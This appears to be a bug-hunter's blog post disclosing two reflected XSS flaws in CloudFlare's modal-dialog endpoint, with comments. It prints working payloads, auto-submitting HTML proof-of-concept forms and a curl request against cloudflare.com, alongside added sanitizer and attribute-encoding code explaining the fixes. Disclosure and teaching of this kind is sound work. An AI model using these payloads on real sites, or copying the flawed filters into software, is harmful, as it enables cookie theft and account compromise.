#1 XSS
These are some duplicate vulnerabilities I found; I just thought I'd share them with you. Recently I found two POST-based XSS issues in CloudFlare and, unfortunately, I was not the first to report them.
I found the first issue in the "Confirm Key Generator" dialog box.
Let's have a closer look at the URL:
/ajax/modal-dialog.html
The dialog is fetched from the client with an XMLHttpRequest (hence the X-Requested-With: XMLHttpRequest header in the request), and the server-side handler accepts our POST request directly.
After playing around with the "content=" parameter, I noticed that it strips all HTML tags except
<b></b> <p></p> <A HREF="">
Since the <A HREF> tag is kept with its attribute intact, and the filter evidently does not check the URL scheme, we can easily execute JavaScript with a javascript: URL:
<A HREF="javascript:alert(document.cookie);">XSS</A>
A tag allowlist on its own is not enough: the href of any allowed <a> also needs a scheme allowlist (http: and https:, for example). Note that this payload fires only when the victim clicks the link.
So the proof of concept would be:
<html>
<!-- POC by Osanda -->
<body>
<form name="exploit" action="https://www.cloudflare.com/ajax/modal-dialog.html" method="POST">
<input type="hidden" name="type" value="default" />
<input type="hidden" name="content" value="Go to this link &lt;A HREF=&quot;javascript:prompt(&apos;XSS by Osanda&apos;);&quot;&gt;XSS&lt;/A&gt;" />
<script>document.exploit.submit();</script>
</form>
</body>
</html>
We don't need an authenticated account to trigger the XSS, since the issue is in modal-dialog.html itself. Here is the curl command:
curl -i -s -k -X 'POST' \
  -H 'User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0' \
  -H 'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' \
  -H 'X-Requested-With: XMLHttpRequest' \
  -H 'Referer: https://www.cloudflare.com/my-account' \
  -b '__cfduid=dcfb031f1436b2c98ee75cfda0b313f9b1395243158470; __utma=1.1850105675.1399902759.1399910158.1400126593.4; __utmz=1.1399902759.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmb=1.7.10.1400126593; __utmc=1; vses2=9pvibldsqecve4b63ef9h13h75; __cf_effload=1' \
  --data-binary $'type=default&content=Go to this link <A HREF=\"javascript:prompt(\'XSS by Osanda\');\">XSS</A>' \
  'https://www.cloudflare.com/ajax/modal-dialog.html'
That's it, game over 🙂
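The filter described above can be modelled in a few lines. The following is an added example, not CloudFlare's code: a tag-allowlist filter that passes <b>, <p> and <a> through verbatim (the observed behaviour), next to a hardened version that strips every attribute except an href whose scheme is allowed. The scheme check decodes character references first and then uses the WHATWG URL parser, so the obfuscations a browser would accept (`&#106;avascript:`, embedded tabs or newlines, mixed case, leading whitespace) are rejected too. The function and constant names are mine; the payload is the post's own.

```javascript
// Added example (not CloudFlare's code): a tag-allowlist filter of the kind described above
// and the href scheme check it is missing. Only the three tags the post lists are allowed.
const ALLOWED_TAGS = new Set(["b", "p", "a"]);
const TAG_RE = /<\/?([a-zA-Z][a-zA-Z0-9]*)\b([^>]*)>/g;

// Naive filter (the observed behaviour): tags on the allowlist pass through verbatim,
// attributes included, so <A HREF="javascript:..."> survives untouched.
function stripDisallowedTags(html) {
  return html.replace(TAG_RE, (tag, name) =>
    ALLOWED_TAGS.has(name.toLowerCase()) ? tag : ""
  );
}

// Minimal character-reference decoder. A browser decodes references in an attribute value
// before the URL parser ever sees it, so "&#106;avascript:" is just "javascript:".
function decodeEntities(s) {
  const named = { amp: "&", lt: "<", gt: ">", quot: '"', apos: "'", Tab: "\t", NewLine: "\n" };
  return s.replace(/&(#[xX][0-9a-fA-F]+|#[0-9]+|[A-Za-z]+);?/g, (m, body) => {
    if (body[0] === "#") {
      const hex = body[1] === "x" || body[1] === "X";
      const cp = parseInt(body.slice(hex ? 2 : 1), hex ? 16 : 10);
      return cp > 0x10ffff ? "\ufffd" : String.fromCodePoint(cp);
    }
    return Object.prototype.hasOwnProperty.call(named, body) ? named[body] : m;
  });
}

// Scheme allowlist applied the way a browser would see the URL: decode references, then let
// the WHATWG URL parser strip leading whitespace and embedded tabs/newlines and lower-case
// the scheme. Relative links resolve against the placeholder base and come out as https:.
const SAFE_SCHEMES = new Set(["http:", "https:", "mailto:"]);
function isSafeHref(rawHref) {
  let url;
  try {
    url = new URL(decodeEntities(rawHref), "https://placeholder.invalid/");
  } catch {
    return false; // unparsable: drop it
  }
  return SAFE_SCHEMES.has(url.protocol);
}

function escapeAttr(s) {
  return s.replace(/&/g, "&amp;").replace(/"/g, "&quot;").replace(/</g, "&lt;").replace(/>/g, "&gt;");
}

// Hardened filter: same tag allowlist, but <b>/<p> lose all attributes and <a> keeps only an
// href whose scheme is allowed. Everything else (on* handlers, style, ...) is dropped.
function sanitizeAllowlist(html) {
  return html.replace(TAG_RE, (tag, name, attrs) => {
    const lname = name.toLowerCase();
    if (!ALLOWED_TAGS.has(lname)) return "";
    const closing = tag.startsWith("</");
    if (closing || lname !== "a") return `<${closing ? "/" : ""}${lname}>`;
    const m = /\bhref\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s"'>]+))/i.exec(attrs);
    const href = m ? (m[1] ?? m[2] ?? m[3]) : null;
    if (href === null || !isSafeHref(href)) return "<a>"; // keep the link text, lose the link
    return `<a href="${escapeAttr(decodeEntities(href))}" rel="noopener noreferrer">`;
  });
}

// The post's own payload, run through both filters.
const AUTHOR_PAYLOAD = `Go to this link <A HREF="javascript:prompt('XSS by Osanda');">XSS</A>`;
console.log(stripDisallowedTags(AUTHOR_PAYLOAD)); // unchanged: the javascript: link survives
console.log(sanitizeAllowlist(AUTHOR_PAYLOAD));   // Go to this link <a>XSS</a>
```

Regex-based filters like this one are fragile against malformed markup; in production the same allowlist and scheme policy should be enforced by a real HTML sanitizer (DOMPurify, for instance) that works on a parsed DOM rather than on text.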
#2 XSS
The second XSS issue was in the "zoneupload" dialog type of modal-dialog.html, via the "target" parameter. In the previous scenario all the HTML tags were stripped; here, instead, the angle brackets are converted into HTML entities. How to bypass this one? 😉
Well, as usual, the characters "'() are not filtered 🙂 so the payload simply closes the attribute value it is reflected into and adds an event handler:
ABC" onmouseover="prompt('XSS by Osanda') ""
Encoding only < and > is not context-aware: a value placed inside an attribute also needs " (and ') encoded, and the attribute itself must be quoted.
Here is the proof of concept:
<html>
<body>
<form action="https://www.cloudflare.com/ajax/modal-dialog.html" method="POST">
<input type="hidden" name="type" value="zoneupload" />
<input type="hidden" name="z" value="google.lk" />
<input type="hidden" name="target" value="ABC&quot; onmouseover=&quot;prompt(&apos;XSS by Osanda&apos;) &quot;&quot;" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
So yeah, here we go, XSS again 😀
Bug hunting is not all about getting your name into halls of fame, receiving rewards, or being the first to report. I just enjoy finding vulnerabilities and love learning something new 🙂
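To make the attribute-context point concrete, here is an added example that is not CloudFlare's code. It models the second filter as "encode < and > only", reflects the value into a double-quoted attribute (the reflection point is an assumption, since the post does not show the template), and re-tokenises the resulting tag the way an HTML parser would to count how many attributes the attacker ended up with. The context-aware encoder is shown next to it, together with the variant that encodes correctly but leaves the attribute unquoted, which fails as well. Function names are mine; the payload is the post's own.

```javascript
// Added example (not CloudFlare's code): encoding only the angle brackets, as the second
// filter appears to, does not protect a value that is reflected inside an attribute.
// The template below is an assumption; the post does not show where "target" is reflected.

// The observed behaviour: tags are neutralised by turning < and > into references,
// but quotes pass through untouched.
function encodeAnglesOnly(s) {
  return s.replace(/</g, "&lt;").replace(/>/g, "&gt;");
}

// Context-aware encoding for a double-quoted attribute value: & first (so existing
// references are not double-decoded), then both quote characters, then the brackets.
function encodeForAttribute(s) {
  return s
    .replace(/&/g, "&amp;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#39;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;");
}

// Hypothetical reflection point: the submitted "target" is echoed into a hidden input.
function renderNaive(target) {
  return `<input type="hidden" name="target" value="${encodeAnglesOnly(target)}">`;
}
function renderSafe(target) {
  return `<input type="hidden" name="target" value="${encodeForAttribute(target)}">`;
}
// Correct encoder, but the attribute is left unquoted: whitespace ends the value.
function renderSafeButUnquoted(target) {
  return `<input type="hidden" name="target" value=${encodeForAttribute(target)}>`;
}

// Re-tokenise the first tag roughly as an HTML parser would and return the attribute names
// it ends up with: a quoted value runs to the matching quote, an unquoted one to whitespace.
function attributeNames(tagHtml) {
  const tag = /^<[a-zA-Z][^\s>\/]*([^>]*)>/.exec(tagHtml);
  if (!tag) return [];
  const names = [];
  const attrRe = /([^\s"'<>\/=]+)(?:\s*=\s*(?:"[^"]*"|'[^']*'|[^\s"'>]+))?/g;
  let a;
  while ((a = attrRe.exec(tag[1])) !== null) names.push(a[1].toLowerCase());
  return names;
}

// The check a reviewer wants: did the attacker manage to introduce an on* attribute?
function hasEventHandler(tagHtml) {
  return attributeNames(tagHtml).some((n) => n.startsWith("on"));
}

const AUTHOR_PAYLOAD = `ABC" onmouseover="prompt('XSS by Osanda') ""`;
console.log(attributeNames(renderNaive(AUTHOR_PAYLOAD)));           // [ 'type', 'name', 'value', 'onmouseover' ]
console.log(attributeNames(renderSafe(AUTHOR_PAYLOAD)));            // [ 'type', 'name', 'value' ]
console.log(attributeNames(renderSafeButUnquoted(AUTHOR_PAYLOAD))); // onmouseover appears again
```

The unquoted variant is the reason "encode the quotes" is only half the rule: with no quotes around the value, the first space in the payload ends it and everything after becomes new attributes, whatever encoding was applied. Encode for the attribute context and always quote the attribute.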
Great brother!
I learn a lot of things with you, thanks!
Great bro!
Dude, nice findings, and I like your wallpaper. Wanna share?
Thanks! I’ll mail you shortly 🙂
wow, awesome bro.
Thanks for your marvelous posting! I actually enjoyed reading it, you could be a great author. I will be sure to bookmark your blog and will come back in the foreseeable future. I want to encourage you to continue your great posts, have a nice morning!
Was this ever fixed?
It's an amazing finding, Sir.
Thanks mate 🙂
Wow nice
wow…aiye..